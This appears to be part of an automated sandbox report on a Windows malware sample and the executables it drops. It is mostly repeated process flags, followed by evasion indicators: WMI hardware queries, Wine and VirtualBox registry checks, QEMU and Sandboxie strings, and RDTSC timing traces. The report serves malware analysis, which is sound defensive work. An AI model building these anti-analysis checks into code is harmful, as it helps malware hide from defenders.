Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000284001\acentric.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000064001\JavvvUmar.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000285001\2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000287001\splwow64.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000290001\crypted.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\607698\Waters.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\607698\Waters.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\607698\Waters.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Roaming\u3uP67496d.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: penis.exe, 00000018.00000002.2227774761.0000000003270000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE`,
Source: aspnet_regiis.exe, 00000020.00000002.3813346257.0000000000508000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: penis.exe, 00000018.00000002.2227774761.0000000003270000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE
Source: penis.exe, 00000018.00000002.2227774761.0000000003270000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \QEMU-GA.EXE@\
Source: aspnet_regiis.exe, 00000020.00000002.3813346257.0000000000508000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: PAUL JONESSBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A664DC second address: A664E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A664E0 second address: A664E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A664E9 second address: A664EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A664EF second address: A66509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4DA4C5B31Fh 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A66509 second address: A6650F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A667FB second address: A667FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A66A7C second address: A66A80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A66A80 second address: A66A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A66A84 second address: A66A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A66A8E second address: A66A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A66A92 second address: A66A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A66A96 second address: A66AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F4DA4C5B316h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007F4DA4C5B327h 0x00000015 push edi 0x00000016 pop edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A66AC5 second address: A66ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A69407 second address: A6940C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A6940C second address: A69475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4DA4C5D850h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jp 00007F4DA4C5D847h 0x00000013 push 00000000h 0x00000015 mov edx, dword ptr [ebp+122D3461h] 0x0000001b mov dh, cl 0x0000001d call 00007F4DA4C5D849h 0x00000022 pushad 0x00000023 jmp 00007F4DA4C5D859h 0x00000028 jmp 00007F4DA4C5D851h 0x0000002d popad 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push edx 0x00000032 js 00007F4DA4C5D846h 0x00000038 pop edx 0x00000039 rdtsc
